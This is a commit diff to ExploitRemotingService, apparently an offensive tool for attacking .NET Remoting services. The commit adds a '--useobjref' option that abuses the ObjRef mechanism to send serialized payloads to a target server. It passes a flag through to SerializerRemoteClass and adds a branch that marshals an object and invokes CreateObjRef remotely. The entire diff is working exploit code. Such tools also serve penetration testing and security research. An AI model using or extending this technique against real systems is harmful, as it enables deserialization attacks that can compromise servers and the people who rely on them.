Add --useobjref option

Author: mwulftange

ExploitRemotingService/CustomChannel.cs

@@ -35,6 +35,8 @@ sealed class CustomChannel
         private readonly bool _one_way;
         private readonly Func<string, MethodBase, object[], object> _get_message_object;
 
+        public Uri Uri { get { return _uri; } }
+
         public CustomChannel(Uri uri, Func<Stream> bind_stream, 
             Func<string, MethodBase, object[], object> get_message_object, 
             bool null_uri, bool one_way)

ExploitRemotingService/Program.cs

@@ -57,6 +57,7 @@ class Program
         private static bool _usecom;
         private static bool _useser;
         private static bool _uselease;
+        private static bool _useObjRef;
         private static string _installdir;
 
         static void SetupServer()
@@ -182,6 +183,8 @@ private static bool ProcessArgs(string[] args)
                         v => _useser = v != null },
                     { "uselease", "Uses new serialization tricks by abusing lease mechanism.",
                         v => _useser = _uselease = v != null },
+                    { "useobjref", "Uses new serialization tricks by abusing ObjRef mechanism.",
+                        v => _useser = _useObjRef = v != null },
                     { "nulluri", "Don't send the URI header to the server", v => _null_uri = v != null },
                     { "autodir", "When useser is specified try and automatically work out the installdir parameter from the server's current directory.", v => _autodir = v != null },
                     { "installdir=", "Specify the install directory of the service executable to enable full support with useser",
@@ -284,7 +287,7 @@ private static IRemoteClass CreateRemoteClassSerial(CustomChannel channel)
                 lease = channel.MakeCall<ILease>(_uri.AbsolutePath, typeof(MarshalByRefObject).GetMethod("InitializeLifetimeService"));
             }
 
-            SerializerRemoteClass remote = new SerializerRemoteClass(channel, lease);
+            SerializerRemoteClass remote = new SerializerRemoteClass(channel, lease, _useObjRef);
             if (!string.IsNullOrWhiteSpace(_installdir) || _autodir)
             {
                 if (_autodir)

ExploitRemotingService/SerializerRemoteClass.cs

@@ -31,12 +31,14 @@ class SerializerRemoteClass : MarshalByRefObject, IRemoteClass, IEqualityCompare
     {
         private readonly CustomChannel _channel;
         private readonly ILease _lease;
+        private readonly bool _useObjRef;
         private object _send_object;
 
-        public SerializerRemoteClass(CustomChannel channel, ILease lease)
+        public SerializerRemoteClass(CustomChannel channel, ILease lease, bool useObjRef)
         {
             _channel = channel;
             _lease = lease;
+            _useObjRef = useObjRef;
         }
 
         private static object GetFileInfo(string path, bool directory)
@@ -80,6 +82,19 @@ private void SendRequestToServer(object retobj)
                 {
                 }
             }
+            else if (_useObjRef)
+            {
+                _send_object = hash;
+                string objUri = _channel.Uri.AbsolutePath;
+                var objRef = RemotingServices.Marshal(this);
+                try
+                {
+                    _channel.MakeCall(objUri, typeof(MarshalByRefObject).GetMethod("CreateObjRef", new[] { typeof(Type) }), objRef);
+                }
+                catch (Exception)
+                {
+                }
+            }
             else
             {
                 Trace.WriteLine(_channel.SendRequest(hash, true).ToString());